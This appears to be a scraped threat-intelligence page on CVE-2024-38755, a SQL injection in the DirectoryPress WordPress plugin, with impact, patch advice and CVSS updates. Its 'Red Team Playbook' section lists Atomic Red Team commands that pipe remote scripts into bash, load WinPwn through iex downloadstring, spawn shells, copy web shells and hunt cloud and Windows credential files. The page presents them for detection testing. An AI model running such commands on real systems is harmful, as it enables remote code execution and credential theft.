CVE-2024-38755
Overview
This vulnerability is a SQL Injection flaw caused by improper neutralization of special elements in SQL commands within the Designinvento DirectoryPress plugin. The root cause lies in insufficient input validation and sanitization of user-supplied data that is directly incorporated into SQL queries. The affected component is the DirectoryPress plugin for WordPress, specifically versions up to and including 3.6.10.
Vulnerability Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Designinvento DirectoryPress allows SQL Injection.This issue affects DirectoryPress: from n/a through 3.6.10.
Impact
An attacker with low-level privileges can leverage this vulnerability to execute arbitrary SQL commands on the backend database, enabling unauthorized access to sensitive information such as user data or configuration settings. This may result in partial data disclosure or modification, and potentially disrupt the availability of the affected application. No user interaction beyond possessing a low-privileged account is required, increasing the risk of lateral movement within the environment and data breach scenarios.
Solution
Users of the Designinvento DirectoryPress plugin should upgrade to a version later than 3.6.10 where this vulnerability is addressed. Detailed patch instructions and version updates are available at the Patchstack advisory: https://patchstack.com/database/vulnerability/directorypress/wordpress-directorypress-plugin-3-6-10-sql-injection-vulnerability?_s_id=cve. Applying the update promptly is recommended to mitigate the SQL Injection risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Designinvento DirectoryPress plugin is characterized by improper neutralization of special elements used in SQL commands, commonly known as SQL Injection. This type of vulnerability occurs when an application fails to adequately sanitize user inputs, allowing attackers to manipulate SQL queries executed by the database. In the case of DirectoryPress, the flaw exists in versions up to 3.6.10, making it susceptible to unauthorized access and data manipulation. Attackers can exploit this vulnerability by injecting malicious SQL code through input fields, which can lead to unauthorized data retrieval, modification, or even deletion of sensitive information stored in the database.
Attack vectors for this vulnerability are varied and can be executed through multiple entry points within the DirectoryPress plugin. For instance, an attacker could target forms that accept user input, such as search fields, login forms, or any other data submission interfaces. By crafting a specially designed input that includes SQL commands, an attacker can manipulate the underlying SQL queries. This exploitation can lead to scenarios where an attacker gains access to user credentials, sensitive personal data, or administrative functionalities. Furthermore, the ease of executing such attacks, combined with the widespread use of the affected plugin, increases the risk of mass exploitation, especially in environments where security measures are not rigorously enforced.
The real-world impact of this vulnerability can be significant for businesses utilizing the DirectoryPress plugin. The potential for data breaches poses severe risks, including financial losses, reputational damage, and legal ramifications due to non-compliance with data protection regulations. Organizations may face the costs associated with incident response, forensic investigations, and potential fines from regulatory bodies. Additionally, if customer data is compromised, businesses risk losing customer trust, which can have long-lasting effects on customer relationships and brand loyalty. The high CVSS score of 8.8 indicates that this vulnerability is critical and should be prioritized for remediation to mitigate the associated risks.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First and foremost, it is essential to update the DirectoryPress plugin to the latest version, where the vulnerability has been addressed. Regularly monitoring and applying security patches is crucial in maintaining a secure environment. Additionally, employing web application firewalls (WAFs) can help filter out malicious traffic and prevent SQL injection attempts. Organizations should also conduct regular security assessments, including penetration testing and code reviews, to identify and remediate vulnerabilities proactively. Furthermore, implementing input validation and parameterized queries in the application code can significantly reduce the risk of SQL injection attacks.
In conclusion, the SQL Injection vulnerability in the Designinvento DirectoryPress plugin presents a serious threat to organizations utilizing this software. The ability for attackers to manipulate SQL queries can lead to severe consequences, including data breaches and significant business risks. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such vulnerabilities. Through diligent detection and mitigation strategies, including timely updates, security assessments, and robust coding practices, businesses can protect themselves from the risks associated with this critical vulnerability.
The CVSS score for CVE-2024-38755 has been revised downward from 8.8 to 8.5, reflecting a refined assessment of the vulnerability’s exploitability and impact. This adjustment, while modest, signals a slightly reduced but still high risk level associated with the SQL injection flaw in Designinvento DirectoryPress. CSURFACE threat intelligence indicates that the Exploit Prediction Scoring System (EPSS) remains stable at a moderate percentile, with no upward trend or emerging exploit activity detected in our telemetry. The absence of new proof-of-concept exploits or active exploitation attempts suggests that adversaries have not yet prioritized this vulnerability, which may influence attacker targeting decisions in the near term. For defenders, this means that while the vulnerability remains a critical concern requiring vigilance, the immediate threat environment has not intensified. Consequently, the overall threat level remains high but without escalation, underscoring the importance of ongoing monitoring and timely patching to mitigate potential exploitation.
Update 2 — June 09, 2026
The CVSS score for CVE-2024-38755 has been revised upward from 8.5 to 8.8, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment indicates a slightly higher risk level, emphasizing the critical nature of the SQL injection flaw in Designinvento DirectoryPress. Although our telemetry continues to show no emergence of new proof-of-concept exploits or active exploitation campaigns, the increased CVSS score signals that the vulnerability’s potential for damage and ease of exploitation may be more severe than initially evaluated. For defenders, this means that while immediate threat activity remains unchanged, the heightened severity rating should prompt a reassessment of prioritization in patch management and risk mitigation strategies. The stable EPSS score and lack of rapid growth in exploit attempts suggest that adversaries have not yet escalated their targeting of this vulnerability, but the elevated CVSS score underscores the importance of maintaining vigilance. Overall, the threat level remains high with a nuanced increase in risk severity, reinforcing the need for continued monitoring and timely remediation efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Designinvento | Directorypress | All |
cpe:2.3:a:designinvento:directorypress:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-38755 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/directorypress/wordpress-directorypress-plugin-3-6-10-sql-injection-vulnerability?_s_id=cve |